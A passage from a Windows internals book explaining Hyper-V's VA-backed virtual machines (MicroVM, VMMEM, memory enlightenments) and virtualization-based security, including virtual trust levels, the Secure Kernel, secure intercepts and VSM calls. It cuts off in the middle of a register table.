footprint. Guest physical memory of this type of VM is generally shared
between multiple containers. Good examples of containers are provided by
Windows Defender Application Guard, which uses a container to provide the
full isolation of the browser, or by Windows Sandbox, which uses containers
to provide a fully isolated virtual environment. Usually a container shares the
same VM’s firmware, operating system, and, often, also some applications
running in it (the shared components compose the base layer of a container).
Running each container in its private guest physical memory space would not
be feasible and would result in a high waste of physical memory.
To solve the problem, the virtualization stack provides support for VA-
backed virtual machines. VA-backed VMs use the host’s operating system’s
memory manager to provide to the guest partition’s physical memory
advanced features like memory deduplication, memory trimming, direct
maps, memory cloning and, most important, paging (all these concepts have
been extensively covered in Chapter 5 of Part 1). For traditional VMs, guest
memory is assigned by the VID driver by statically allocating system
physical pages from the host and mapping them in the GPA space of the VM
before any virtual processor has the chance to execute, but for VA-backed
VMs, a new layer of indirection is added between the GPA space and SPA
space. Instead of mapping SPA pages directly into the GPA space, the VID
creates a GPA space that is initially blank, creates a user mode minimal
process (called VMMEM) for hosting a VA space, and sets up GPA to VA
mappings using MicroVM. MicroVM is a new component of the NT kernel
tightly integrated with the NT memory manager that is ultimately responsible
for managing the GPA to SPA mapping by composing the GPA to VA
mapping (maintained by the VID) with the VA to SPA mapping (maintained
by the NT memory manager).
The new layer of indirection allows VA-backed VMs to take advantage of
most memory management features that are exposed to Windows processes.
As discussed in the previous section, the VM Worker process, when it starts
the VM, asks the VID driver to create the partition’s memory block. In case
the VM is VA-backed, it creates the Memory Block Range GPA mapping
bitmap, which is used to keep track of the allocated virtual pages backing the
new VM’s RAM. It then creates the partition’s RAM memory, backed by a
big range of VA space. The VA space is usually as big as the allocated
amount of VM’s RAM memory (note that this is not a necessary condition:
different VA-ranges can be mapped as different GPA ranges) and is reserved
in the context of the VMMEM process using the native
NtAllocateVirtualMemory API.
If the “deferred commit” optimization is not enabled (see the next section
for more details), the VID driver performs another call to the
NtAllocateVirtualMemory API with the goal of committing the entire VA
range. As discussed in Chapter 5 of Part 1, committing memory charges the
system commit limit but still doesn’t allocate any physical page (all the PTE
entries describing the entire range are invalid demand-zero PTEs). The VID
driver at this stage uses Winhvr to ask the hypervisor to map the entire
partition’s GPA space to a special invalid SPA (by using the same
HvMapGpaPages hypercall used for standard partitions). When the guest
partition accesses guest physical memory that is mapped in the SLAT table
by the special invalid SPA, it causes a VMEXIT to the hypervisor, which
recognizes the special value and injects a memory intercept to the root
partition.
The VID driver finally notifies MicroVM of the new VA-backed GPA
range by invoking the VmCreateMemoryRange routine (MicroVM services
are exposed by the NT kernel to the VID driver through a Kernel Extension).
MicroVM allocates and initializes a VM_PROCESS_CONTEXT data
structure, which contains two important RB trees: one describing the
allocated GPA ranges in the VM and one describing the corresponding
system virtual address (SVA) ranges in the root partition. A pointer to the
allocated data structure is then stored in the EPROCESS of the VMMEM
instance.
When the VM Worker process wants to write into the memory of the VA-
backed VM, or when a memory intercept is generated due to an invalid GPA
to SPA translation, the VID driver calls into the MicroVM page fault handler
(VmAccessFault). The handler performs two important operations: first, it
resolves the fault by inserting a valid PTE in the page table describing the
faulting virtual page (more details in Chapter 5 of Part 1) and then updates
the SLAT table of the child VM (by calling the WinHvr driver, which emits
another HvMapGpaPages hypercall). Afterward, the VM’s guest physical
pages can be paged out simply because private process memory is normally
pageable. This has the important implication that it requires the majority of
the MicroVM’s function to operate at passive IRQL.
Multiple services of the NT memory manager can be used for VA-backed
VMs. In particular, clone templates allow the memory of two different VA-
backed VMs to be quickly cloned; direct map allows shared executable
images or data files to have their section objects mapped into the VMMEM
process and into a GPA range pointing to that VA region. The underlying
physical pages can be shared between different VMs and host processes,
leading to improved memory density.
VA-backed VMs optimizations
As introduced in the previous section, the cost of a guest access to
dynamically backed memory that isn’t currently backed, or does not grant the
required permissions, can be quite expensive: when a guest access attempt is
made to inaccessible memory, a VMEXIT occurs, which requires the
hypervisor to suspend the guest VP, schedule the root partition’s VP, and
inject a memory intercept message to it. The VID’s intercept callback handler
is invoked at high IRQL, but processing the request and calling into
MicroVM requires running at PASSIVE_LEVEL. Thus, a DPC is queued. The
DPC routine sets an event that wakes up the appropriate thread in charge of
processing the intercept. After the MicroVM page fault handler has resolved
the fault and called the hypervisor to update the SLAT entry (through another
hypercall, which produces another VMEXIT), it resumes the guest’s VP.
Large numbers of memory intercepts generated at runtime result in big
performance penalties. With the goal to avoid this, multiple optimizations
have been implemented in the form of guest enlightenments (or simple
configurations):
■ Memory zeroing enlightenments
■ Memory access hints
■ Enlightened page fault
■ Deferred commit and other optimizations
Memory-zeroing enlightenments
To avoid information disclosure to a VM of memory artifacts previously in
use by the root partition or another VM, memory-backing guest RAM is
zeroed before being mapped for access by the guest. Typically, an operating
system zeroes all physical memory during boot because on a physical system
the contents are nondeterministic. For a VM, this means that memory may be
zeroed twice: once by the virtualization host and again by the guest operating
system. For physically backed VMs, this is at best a waste of CPU cycles. For
VA-backed VMs, the zeroing by the guest OS generates costly memory
intercepts. To avoid the wasted intercepts, the hypervisor exposes the
memory-zeroing enlightenments.
When the Windows Loader loads the main operating system, it uses
services provided by the UEFI firmware to get the machine’s physical
memory map. When the hypervisor starts a VA-backed VM, it exposes the
HvGetBootZeroedMemory hypercall, which the Windows Loader can use to
query the list of physical memory ranges that are actually already zeroed.
Before transferring the execution to the NT kernel, the Windows Loader
merges the obtained zeroed ranges with the list of physical memory
descriptors obtained through EFI services and stored in the Loader block
(further details on startup mechanisms are available in Chapter 12). The NT
kernel inserts the merged descriptor directly in the zeroed pages list by
skipping the initial memory zeroing.
In a similar way, the hypervisor supports the hot-add memory zeroing
enlightenment with a simple implementation: When the dynamic memory
VSC driver (dmvsc.sys) initiates the request to add physical memory to the
NT kernel, it specifies the
MM_ADD_PHYSICAL_MEMORY_ALREADY_ZEROED flag, which hints
the Memory Manager (MM) to add the new pages directly to the zeroed
pages list.
Memory access hints
For physically backed VMs, the root partition has very limited information
about how guest MM intends to use its physical pages. For these VMs, the
information is mostly irrelevant because almost all memory and GPA
mappings are created when the VM is started, and they remain statically
mapped. For VA-backed VMs, this information can instead be very useful
because the host memory manager manages the working set of the minimal
process that contains the VM’s memory (VMMEM).
The hot hint allows the guest to indicate that a set of physical pages should
be mapped into the guest because they will be accessed soon or frequently.
This implies that the pages are added to the working set of the minimal
process. The VID handles the hint by telling MicroVM to fault in the
physical pages immediately and not to remove them from the VMMEM
process’s working set.
In a similar way, the cold hint allows the guest to indicate that a set of
physical pages should be unmapped from the guest because it will not be
used soon. The VID driver handles the hint by forwarding it to MicroVM,
which immediately removes the pages from the working set. Typically, the
guest uses the cold hint for pages that have been zeroed by the background
zero page thread (see Chapter 5 of Part 1 for more details).
The VA-backed guest partition specifies a memory hint for a page by
using the HvMemoryHeatHint hypercall.
Enlightened page fault (EPF)
Enlightened page fault (EPF) handling is a feature that allows the VA-backed
guest partition to reschedule threads on a VP that caused a memory intercept
for a VA-backed GPA page. Normally, a memory intercept for such a page is
handled by synchronously resolving the access fault in the root partition and
resuming the VP upon access fault completion. When EPF is enabled and a
memory intercept occurs for a VA-backed GPA page, the VID driver in the
root partition creates a background worker thread that calls the MicroVM
page fault handler and delivers a synchronous exception (not to be confused
by an asynchronous interrupt) to the guest’s VP, with the goal to let it know
that the current thread caused a memory intercept.
The guest reschedules the thread; meanwhile, the host is handling the
access fault. Once the access fault has been completed, the VID driver will
add the original faulting GPA to a completion queue and deliver an
asynchronous interrupt to the guest. The interrupt causes the guest to check
the completion queue and unblock any threads that were waiting on EPF
completion.
Deferred commit and other optimizations
Deferred commit is an optimization that, if enabled, forces the VID driver not
to commit each backing page until first access. This potentially allows more
VMs to run simultaneously without increasing the size of the page file, but,
since the backing VA space is only reserved, and not committed, the VMs
may crash at runtime due to the commitment limit being reached in the root
partition. In this case, there is no more free memory available.
Other optimizations are available to set the size of the pages which will be
allocated by the MicroVM page fault handler (small versus large) and to pin
the backing pages upon first access. This prevents aging and trimming,
generally resulting in more consistent performance, but consumes more
memory and reduces the memory density.
The VMMEM process
The VMMEM process exists mainly for two main reasons:
■ Hosts the VP-dispatch thread loop when the root scheduler is enabled,
which represents the guest VP schedulable unit
■ Hosts the VA space for the VA-backed VMs
The VMMEM process is created by the VID driver while creating the
VM’s partition. As for regular partitions (see the previous section for details),
the VM Worker process initializes the VM setup through the VID.dll library,
which calls into the VID through an IOCTL. If the VID driver detects that
the new partition is VA-backed, it calls into the MicroVM (through the
VsmmNtSlatMemoryProcessCreate function) to create the minimal process.
MicroVM uses the PsCreateMinimalProcess function, which allocates the
process, creates its address space, and inserts the process into the process list.
It then reserves the bottom 4 GB of address space to ensure that no direct-
mapped images end up there (this can reduce the entropy and security for the
guest). The VID driver applies a specific security descriptor to the new
VMMEM process; only the SYSTEM and the VM Worker process can
access it. (The VM Worker process is launched with a specific token; the
token’s owner is set to a SID generated from the VM’s unique GUID.) This
is important because the virtual address space of the VMMEM process could
have been accessible to anyone otherwise. By reading the process virtual
memory, a malicious user could read the VM private guest physical memory.
Virtualization-based security (VBS)
As discussed in the previous section, Hyper-V provides the services needed
for managing and running virtual machines on Windows systems. The
hypervisor guarantees the necessary isolation between each partition. In this
way, a virtual machine can’t interfere with the execution of another one. In
this section, we describe another important component of the Windows
virtualization infrastructure: the Secure Kernel, which provides the basic
services for the virtualization-based security.
First, we list the services provided by the Secure Kernel and its
requirements, and then we describe its architecture and basic components.
Furthermore, we present some of its basic internal data structures. Then we
discuss the Secure Kernel and Virtual Secure Mode startup method,
describing its high dependency on the hypervisor. We conclude by analyzing
the components that are built on the top of Secure Kernel, like the Isolated
User Mode, Hypervisor Enforced Code Integrity, the secure software
enclaves, secure devices, and Windows kernel hot-patching and microcode
services.
Virtual trust levels (VTLs) and Virtual Secure
Mode (VSM)
As discussed in the previous section, the hypervisor uses the SLAT to
maintain each partition in its own memory space. The operating system that
runs in a partition accesses memory using the standard way (guest virtual
addresses are translated in guest physical addresses by using page tables).
Under the cover, the hardware translates all the partition GPAs to real SPAs
and then performs the actual memory access. This last translation layer is
maintained by the hypervisor, which uses a separate SLAT table per partition.
In a similar way, the hypervisor can use SLAT to create different security
domains in a single partition. Thanks to this feature, Microsoft designed the
Secure Kernel, which is the base of the Virtual Secure Mode.
Traditionally, the operating system has had a single physical address
space, and the software running at ring 0 (that is, kernel mode) could have
access to any physical memory address. Thus, if any software running in
supervisor mode (kernel, drivers, and so on) becomes compromised, the
entire system becomes compromised too. Virtual secure mode leverages the
hypervisor to provide new trust boundaries for systems software. With VSM,
security boundaries (described by the hypervisor using SLAT) can be put in
place that limit the resources supervisor mode code can access. Thus, with
VSM, even if supervisor mode code is compromised, the entire system is not
compromised.
VSM provides these boundaries through the concept of virtual trust levels
(VTLs). At its core, a VTL is a set of access protections on physical memory.
Each VTL can have a different set of access protections. In this way, VTLs
can be used to provide memory isolation. A VTL’s memory access
protections can be configured to limit what physical memory a VTL can
access. With VSM, a virtual processor is always running at a particular VTL
and can access only physical memory that is marked as accessible through
the hypervisor SLAT. For example, if a processor is running at VTL 0, it can
only access memory as controlled by the memory access protections
associated with VTL 0. This memory access enforcement happens at the
guest physical memory translation level and thus cannot be changed by
supervisor mode code in the partition.
VTLs are organized as a hierarchy. Higher levels are more privileged than
lower levels, and higher levels can adjust the memory access protections for
lower levels. Thus, software running at VTL 1 can adjust the memory access
protections of VTL 0 to limit what memory VTL 0 can access. This allows
software at VTL 1 to hide (isolate) memory from VTL 0. This is an
important concept that is the basis of the VSM. Currently the hypervisor
supports only two VTLs: VTL 0 represents the Normal OS execution
environment, which the user interacts with; VTL 1 represents the Secure
Mode, where the Secure Kernel and Isolated User Mode (IUM) runs.
Because VTL 0 is the environment in which the standard operating system
and applications run, it is often referred to as the normal mode.
Note
The VSM architecture was initially designed to support a maximum of 16
VTLs. At the time of this writing, only 2 VTLs are supported by the
hypervisor. In the future, it could be possible that Microsoft will add one
or more new VTLs. For example, latest versions of Windows Server
running in Azure also support Confidential VMs, which run their Host
Compatibility Layer (HCL) in VTL 2.
Each VTL has the following characteristics associated with it:
■ Memory access protection As already discussed, each virtual trust
level has a set of guest physical memory access protections, which
defines how the software can access memory.
■ Virtual processor state A virtual processor in the hypervisor share
some registers with each VTL, whereas some other registers are
private per each VTL. The private virtual processor state for a VTL
cannot be accessed by software running at a lower VTL. This allows
for isolation of the processor state between VTLs.
■ Interrupt subsystem Each VTL has a unique interrupt subsystem
(managed by the hypervisor synthetic interrupt controller). A VTL’s
interrupt subsystem cannot be accessed by software running at a
lower VTL. This allows for interrupts to be managed securely at a
particular VTL without risk of a lower VTL generating unexpected
interrupts or masking interrupts.
Figure 9-30 shows a scheme of the memory protection provided by the
hypervisor to the Virtual Secure Mode. The hypervisor represents each VTL
of the virtual processor through a different VMCS data structure (see the
previous section for more details), which includes a specific SLAT table. In
this way, software that runs in a particular VTL can access just the physical
memory pages assigned to its level. The important concept is that the SLAT
protection is applied to the physical pages and not to the virtual pages, which
are protected by the standard page tables.
Figure 9-30 Scheme of the memory protection architecture provided by
the hypervisor to VSM.
Services provided by the VSM and requirements
Virtual Secure Mode, which is built on the top of the hypervisor, provides the
following services to the Windows ecosystem:
■ Isolation IUM provides a hardware-based isolated environment for
each software that runs in VTL 1. Secure devices managed by the
Secure Kernel are isolated from the rest of the system and run in VTL
1 user mode. Software that runs in VTL 1 usually stores secrets that
can’t be intercepted or revealed in VTL 0. This service is used heavily
by Credential Guard. Credential Guard is the feature that stores all the
system credentials in the memory address space of the LsaIso trustlet,
which runs in VTL 1 user mode.
■ Control over VTL 0 The Hypervisor Enforced Code Integrity
(HVCI) checks the integrity and the signing of each module that the
normal OS loads and runs. The integrity check is done entirely in
VTL 1 (which has access to all the VTL 0 physical memory). No
VTL 0 software can interfere with the signing check. Furthermore,
HVCI guarantees that all the normal mode memory pages that contain
executable code are marked as not writable (this feature is called
W^X. Both HVCI and W^X have been discussed in Chapter 7 of Part
1).
■ Secure intercepts VSM provides a mechanism to allow a higher VTL
to lock down critical system resources and prevent access to them by
lower VTLs. Secure intercepts are used extensively by HyperGuard,
which provides another protection layer for the VTL 0 kernel by
stopping malicious modifications of critical components of the
operating systems.
■ VBS-based enclaves A security enclave is an isolated region of
memory within the address space of a user mode process. The enclave
memory region is not accessible even to higher privilege levels. The
original implementation of this technology was using hardware
facilities to properly encrypt memory belonging to a process. A VBS-
based enclave is a secure enclave whose isolation guarantees are
provided using VSM.
■ Kernel Control Flow Guard VSM, when HVCI is enabled, provides
Control Flow Guard (CFG) to each kernel module loaded in the
normal world (and to the NT kernel itself). Kernel mode software
running in normal world has read-only access to the bitmap, so an
exploit can’t potentially modify it. Thanks to this reason, kernel CFG
in Windows is also known as Secure Kernel CFG (SKCFG).
Note
CFG is the Microsoft implementation of Control Flow Integrity, a
technique that prevents a wide variety of malicious attacks from
redirecting the flow of the execution of a program. Both user mode and
Kernel mode CFG have been discussed extensively in Chapter 7 of Part 1.
■ Secure devices Secure devices are a new kind of devices that are
mapped and managed entirely by the Secure Kernel in VTL 1. Drivers
for these kinds of devices work entirely in VTL 1 user mode and use
services provided by the Secure Kernel to map the device I/O space.
To be properly enabled and work correctly, the VSM has some hardware
requirements. The host system must support virtualization extensions (Intel
VT-x, AMD SVM, or ARM TrustZone) and the SLAT. VSM won’t work if
one of the previous hardware features is not present in the system processor.
Some other hardware features are not strictly necessary, but in case they are
not present, some security premises of VSM may not be guaranteed:
■ An IOMMU is needed to protect against physical device DMA
attacks. If the system processors don’t have an IOMMU, VSM can
still work but is vulnerable to these physical device attacks.
■ A UEFI BIOS with Secure Boot enabled is needed for protecting the
boot chain that leads to the startup of the hypervisor and the Secure
Kernel. If Secure Boot is not enabled, the system is vulnerable to boot
attacks, which can modify the integrity of the hypervisor and Secure
Kernel before they have the chances to get executed.
Some other components are optional, but when they’re present they
increase the overall security and responsiveness of the system. The TPM
presence is a good example. It is used by the Secure Kernel to store the
Master Encryption key and to perform Secure Launch (also known as
DRTM; see Chapter 12 for more details). Another hardware component that
can improve VSM responsiveness is the processor’s Mode-Based Execute
Control (MBEC) hardware support: MBEC is used when HVCI is enabled to
protect the execution state of user mode pages in kernel mode. With
Hardware MBEC, the hypervisor can set the executable state of a physical
memory page based on the CPL (kernel or user) domain of the specific VTL.
In this way, memory that belongs to user mode application can be physically
marked executable only by user mode code (kernel exploits can no longer
execute their own code located in the memory of a user mode application). In
case hardware MBEC is not present, the hypervisor needs to emulate it, by
using two different SLAT tables for VTL 0 and switching them when the
code execution changes the CPL security domain (going from user mode to
kernel mode and vice versa produces a VMEXIT in this case). More details
on HVCI have been already discussed in Chapter 7 of Part 1.
EXPERIMENT: Detecting VBS and its provided
services
In Chapter 12, we discuss the VSM startup policy and provide the
instructions to manually enable or disable Virtualization-Based
Security. In this experiment, we determine the state of the different
features provided by the hypervisor and the Secure Kernel. VBS is
a technology that is not directly visible to the user. The System
Information tool distributed with the base Windows installation is
able to show the details about the Secure Kernel and its related
technologies. You can start it by typing msinfo32 in the Cortana
search box. Be sure to run it as Administrator; certain details
require a full-privileged user account.
In the following figure, VBS is enabled and includes HVCI
(specified as Hypervisor Enforced Code Integrity), UEFI runtime
virtualization (specified as UEFI Readonly), MBEC (specified as
Mode Based Execution Control). However, the system described in
the example does not include an enabled Secure Boot and does not
have a working IOMMU (specified as DMA Protection in the
Virtualization-Based Security Available Security Properties line).
More details about how to enable, disable, and lock the VBS
configuration are available in the “Understanding the VSM policy”
experiment of Chapter 12.
The Secure Kernel
The Secure Kernel is implemented mainly in the securekernel.exe file and is
launched by the Windows Loader after the hypervisor has already been
successfully started. As shown in Figure 9-31, the Secure Kernel is a minimal
OS that works strictly with the normal kernel, which resides in VTL 0. As for
any normal OS, the Secure Kernel runs in CPL 0 (also known as ring 0 or
kernel mode) of VTL 1 and provides services (the majority of them through
system calls) to the Isolated User Mode (IUM), which lives in CPL 3 (also
known as ring 3 or user mode) of VTL 1. The Secure Kernel has been
designed to be as small as possible with the goal to reduce the external attack
surface. It’s not extensible with external device drivers like the normal
kernel. The only kernel modules that extend their functionality are loaded by
the Windows Loader before VSM is launched and are imported from
securekernel.exe:
■ Skci.dll Implements the Hypervisor Enforced Code Integrity part of
the Secure Kernel
■ Cng.sys Provides the cryptographic engine to the Secure Kernel
■ Vmsvcext.dll Provides support for the attestation of the Secure
Kernel components in Intel TXT (Trusted Boot) environments (more
information about Trusted Boot is available in Chapter 12)
Figure 9-31 Virtual Secure Mode Architecture scheme, built on top of the
hypervisor.
While the Secure Kernel is not extensible, the Isolated User Mode includes
specialized processes called Trustlets. Trustlets are isolated among each other
and have specialized digital signature requirements. They can communicate
with the Secure Kernel through syscalls and with the normal world through
Mailslots and ALPC. Isolated User Mode is discussed later in this chapter.
Virtual interrupts
When the hypervisor configures the underlying virtual partitions, it requires
that the physical processors produce a VMEXIT every time an external
interrupt is raised by the CPU physical APIC (Advanced Programmable
Interrupt Controller). The hardware’s virtual machine extensions allow the
hypervisor to inject virtual interrupts to the guest partitions (more details are
in the Intel, AMD, and ARM user manuals). Thanks to these two facts, the
hypervisor implements the concept of a Synthetic Interrupt Controller
(SynIC). A SynIC can manage two kind of interrupts. Virtual interrupts are
interrupts delivered to a guest partition’s virtual APIC. A virtual interrupt can
represent and be associated with a physical hardware interrupt, which is
generated by the real hardware. Otherwise, a virtual interrupt can represent a
synthetic interrupt, which is generated by the hypervisor itself in response to
certain kinds of events. The SynIC can map physical interrupts to virtual
ones. A VTL has a SynIC associated with each virtual processor in which the
VTL runs. At the time of this writing, the hypervisor has been designed to
support 16 different synthetic interrupt vectors (only 2 are actually in use,
though).
When the system starts (phase 1 of the NT kernel’s initialization) the ACPI
driver maps each interrupt to the correct vector using services provided by
the HAL. The NT HAL is enlightened and knows whether it’s running under
VSM. In that case, it calls into the hypervisor for mapping each physical
interrupt to its own VTL. Even the Secure Kernel could do the same. At the
time of this writing, though, no physical interrupts are associated with the
Secure Kernel (this can change in the future; the hypervisor already supports
this feature). The Secure Kernel instead asks the hypervisor to receive only
the following virtual interrupts: Secure Timers, Virtual Interrupt Notification
Assist (VINA), and Secure Intercepts.
Note
It’s important to understand that the hypervisor requires the underlying
hardware to produce a VMEXIT while managing interrupts that are only
of external types. Exceptions are still managed in the same VTL the
processor is executing at (no VMEXIT is generated). If an instruction
causes an exception, the latter is still managed by the structured exception
handling (SEH) code located in the current VTL.
To understand the three kinds of virtual interrupts, we must first introduce
how interrupts are managed by the hypervisor.
In the hypervisor, each VTL has been designed to securely receive
interrupts from devices associated with its own VTL, to have a secure timer
facility which can’t be interfered with by less secure VTLs, and to be able to
prevent interrupts directed to lower VTLs while executing code at a higher
VTL. Furthermore, a VTL should be able to send IPI interrupts to other
processors. This design produces the following scenarios:
■ When running at a particular VTL, reception of interrupts targeted at
the current VTL results in standard interrupt handling (as determined
by the virtual APIC controller of the VP).
■ When an interrupt is received that is targeted at a higher VTL, receipt
of the interrupt results in a switch to the higher VTL to which the
interrupt is targeted if the IRQL value for the higher VTL would
allow the interrupt to be presented. If the IRQL value of the higher
VTL does not allow the interrupt to be delivered, the interrupt is
queued without switching the current VTL. This behavior allows a
higher VTL to selectively mask interrupts when returning to a lower
VTL. This could be useful if the higher VTL is running an interrupt
service routine and needs to return to a lower VTL for assistance in
processing the interrupt.
■ When an interrupt is received that is targeted at a lower VTL than the
current executing VTL of a virtual processor, the interrupt is queued
for future delivery to the lower VTL. An interrupt targeted at a lower
VTL will never preempt execution of the current VTL. Instead, the
interrupt is presented when the virtual processor next transitions to the
targeted VTL.
Preventing interrupts directed to lower VTLs is not always a great
solution. In many cases, it could lead to the slowing down of the normal OS
execution (especially in mission-critical or game environments). To better
manage these conditions, the VINA has been introduced. As part of its
normal event dispatch loop, the hypervisor checks whether there are pending
interrupts queued to a lower VTL. If so, the hypervisor injects a VINA
interrupt to the current executing VTL. The Secure Kernel has a handler
registered for the VINA vector in its virtual IDT. The handler
(ShvlVinaHandler function) executes a normal call
(NORMALKERNEL_VINA) to VTL 0 (Normal and Secure Calls are
discussed later in this chapter). This call forces the hypervisor to switch to
the normal kernel (VTL 0). As long as the VTL is switched, all the queued
interrupts will be correctly dispatched. The normal kernel will reenter VTL 1
by emitting a SECUREKERNEL_RESUMETHREAD Secure Call.
Secure IRQLs
The VINA handler will not always be executed in VTL 1. Similar to the NT
kernel, this depends on the actual IRQL the code is executing into. The
current executing code’s IRQL masks all the interrupts that are associated
with an IRQL that’s less than or equal to it. The mapping between an
interrupt vector and the IRQL is maintained by the Task Priority Register
(TPR) of the virtual APIC, like in case of real physical APICs (consult the
Intel Architecture Manual for more information). As shown in Figure 9-32,
the Secure Kernel supports different levels of IRQL compared to the normal
kernel. Those IRQL are called Secure IRQL.
Figure 9-32 Secure Kernel interrupts request levels (IRQL).
The first three secure IRQL are managed by the Secure Kernel in a way
similar to the normal world. Normal APCs and DPCs (targeting VTL 0) still
can’t preempt code executing in VTL 1 through the hypervisor, but the
VINA interrupt is still delivered to the Secure Kernel (the operating system
manages the three software interrupts by writing in the target processor’s
APIC Task-Priority Register, an operation that causes a VMEXIT to the
hypervisor. For more information about the APIC TPR, see the Intel, AMD,
or ARM manuals). This means that if a normal-mode DPC is targeted at a
processor while it is executing VTL 1 code (at a compatible secure IRQL,
which should be less than Dispatch), the VINA interrupt will be delivered
and will switch the execution context to VTL 0. As a matter of fact, this
executes the DPC in the normal world and raises for a while the normal
kernel’s IRQL to dispatch level. When the DPC queue is drained, the normal
kernel’s IRQL drops. Execution flow returns to the Secure Kernel thanks to
the VSM communication loop code that is located in the
VslpEnterIumSecureMode routine. The loop processes each normal call
originated from the Secure Kernel.
The Secure Kernel maps the first three secure IRQLs to the same IRQL of
the normal world. When a Secure call is made from code executing at a
particular IRQL (still less or equal to dispatch) in the normal world, the
Secure Kernel switches its own secure IRQL to the same level. Vice versa,
when the Secure Kernel executes a normal call to enter the NT kernel, it
switches the normal kernel’s IRQL to the same level as its own. This works
only for the first three levels.
The normal raised level is used when the NT kernel enters the secure
world at an IRQL higher than the DPC level. In those cases, the Secure
Kernel maps all of the normal-world IRQLs, which are above DPC, to its
normal raised secure level. Secure Kernel code executing at this level can’t
receive any VINA for any kind of software IRQLs in the normal kernel (but
it can still receive a VINA for hardware interrupts). Every time the NT kernel
enters the secure world at a normal IRQL above DPC, the Secure Kernel
raises its secure IRQL to normal raised.
Secure IRQLs equal to or higher than VINA can never be preempted by
any code in the normal world. This explains why the Secure Kernel supports
the concept of secure, nonpreemptable timers and Secure Intercepts. Secure
timers are generated from the hypervisor’s clock interrupt service routine
(ISR). This ISR, before injecting a synthetic clock interrupt to the NT kernel,
checks whether there are one or more secure timers that are expired. If so, it
injects a synthetic secure timer interrupt to VTL 1. Then it proceeds to
forward the clock tick interrupt to the normal VTL.
Secure intercepts
There are cases where the Secure Kernel may need to prevent the NT kernel,
which executes at a lower VTL, from accessing certain critical system
resources. For example, writes to some processor’s MSRs could potentially
be used to mount an attack that would disable the hypervisor or subvert some
of its protections. VSM provides a mechanism to allow a higher VTL to lock
down critical system resources and prevent access to them by lower VTLs.
The mechanism is called secure intercepts.
Secure intercepts are implemented in the Secure Kernel by registering a
synthetic interrupt, which is provided by the hypervisor (remapped in the
Secure Kernel to vector 0xF0). The hypervisor, when certain events cause a
VMEXIT, injects a synthetic interrupt to the higher VTL on the virtual
processor that triggered the intercept. At the time of this writing, the Secure
Kernel registers with the hypervisor for the following types of intercepted
events:
■ Write to some vital processor’s MSRs (Star, Lstar, Cstar, Efer,
Sysenter, Ia32Misc, and APIC base on AMD64 architectures) and
special registers (GDT, IDT, LDT)
■ Write to certain control registers (CR0, CR4, and XCR0)
■ Write to some I/O ports (ports 0xCF8 and 0xCFC are good examples;
the intercept manages the reconfiguration of PCI devices)
■ Invalid access to protected guest physical memory
When VTL 0 software causes an intercept that will be raised in VTL 1, the
Secure Kernel needs to recognize the intercept type from its interrupt service
routine. For this purpose, the Secure Kernel uses the message queue allocated
by the SynIC for the “Intercept” synthetic interrupt source (see the “Inter-
partition communication” section previously in this section for more details
about the SynIC and SINT). The Secure Kernel is able to discover and map
the physical memory page by checking the SIMP synthetic MSR, which is
virtualized by the hypervisor. The mapping of the physical page is executed
at the Secure Kernel initialization time in VTL 1. The Secure Kernel’s
startup is described later in this chapter.
Intercepts are used extensively by HyperGuard with the goal to protect
sensitive parts of the normal NT kernel. If a malicious rootkit installed in the
NT kernel tries to modify the system by writing a particular value to a
protected register (for example to the syscall handlers, CSTAR and LSTAR,
or model-specific registers), the Secure Kernel intercept handler
(ShvlpInterceptHandler) filters the new register’s value, and, if it discovers
that the value is not acceptable, it injects a General Protection Fault (GPF)
nonmaskable exception to the NT kernel in VLT 0. This causes an immediate
bugcheck resulting in the system being stopped. If the value is acceptable, the
Secure Kernel writes the new value of the register using the hypervisor
through the HvSetVpRegisters hypercall (in this case, the Secure Kernel is
proxying the access to the register).
Control over hypercalls
The last intercept type that the Secure Kernel registers with the hypervisor is
the hypercall intercept. The hypercall intercept’s handler checks that the
hypercall emitted by the VTL 0 code to the hypervisor is legit and is
originated from the operating system itself, and not through some external
modules. Every time in any VTL a hypercall is emitted, it causes a VMEXIT
in the hypervisor (by design). Hypercalls are the base service used by kernel
components of each VTL to request services between each other (and to the
hypervisor itself). The hypervisor injects a synthetic intercept interrupt to the
higher VTL only for hypercalls used to request services directly to the
hypervisor, skipping all the hypercalls used for secure and normal calls to and
from the Secure Kernel.
If the hypercall is not recognized as valid, it won’t be executed: the Secure
Kernel in this case updates the lower VTL’s registers with the goal to signal
the hypercall error. The system is not crashed (although this behavior can
change in the future); the calling code can decide how to manage the error.
VSM system calls
As we have introduced in the previous sections, VSM uses hypercalls to
request services to and from the Secure Kernel. Hypercalls were originally
designed as a way to request services to the hypervisor, but in VSM the
model has been extended to support new types of system calls:
■ Secure calls are emitted by the normal NT kernel in VTL 0 to require
services to the Secure Kernel.
■ Normal calls are requested by the Secure Kernel in VTL 1 when it
needs services provided by the NT kernel, which runs in VTL 0.
Furthermore, some of them are used by secure processes (trustlets)
running in Isolated User Mode (IUM) to request services from the
Secure Kernel or the normal NT kernel.
These kinds of system calls are implemented in the hypervisor, the Secure
Kernel, and the normal NT kernel. The hypervisor defines two hypercalls for
switching between different VTLs: HvVtlCall and HvVtlReturn. The Secure
Kernel and NT kernel define the dispatch loop used for dispatching Secure
and Normal Calls.
Furthermore, the Secure Kernel implements another type of system call:
secure system calls. They provide services only to secure processes
(trustlets), which run in IUM. These system calls are not exposed to the
normal NT kernel. The hypervisor is not involved at all while processing
secure system calls.
Virtual processor state
Before delving into the Secure and Normal calls architecture, it is necessary
to analyze how the virtual processor manages the VTL transition. Secure
VTLs always operate in long mode (which is the execution model of AMD64
processors where the CPU accesses 64-bit-only instructions and registers),
with paging enabled. Any other execution model is not supported. This
simplifies launch and management of secure VTLs and also provides an extra
level of protection for code running in secure mode. (Some other important
implications are discussed later in the chapter.)
For efficiency, a virtual processor has some registers that are shared
between VTLs and some other registers that are private to each VTL. The
state of the shared registers does not change when switching between VTLs.
This allows a quick passing of a small amount of information between VTLs,
and it also reduces the context switch overhead when switching between
VTLs. Each VTL has its own instance of private registers, which could only
be accessed by that VTL. The hypervisor handles saving and restoring the
contents of private registers when switching between VTLs. Thus, when
entering a VTL on a virtual processor, the state of the private registers
contains the same values as when the virtual processor last ran that VTL.
Most of a virtual processor’s register state is shared between VTLs.
Specifically, general purpose registers, vector registers, and floating-point
registers are shared between all VTLs with a few exceptions, such as the RIP
and the RSP registers. Private registers include some control registers, some
architectural registers, and hypervisor virtual MSRs. The secure intercept
mechanism (see the previous section for details) is used to allow the Secure
environment to control which MSR can be accessed by the normal mode
environment. Table 9-3 summarizes which registers are shared between
VTLs and which are private to each VTL.
Table 9-3 Virtual processor per-VTL register states
T
y
p
e
General
Registers
MSRs
S
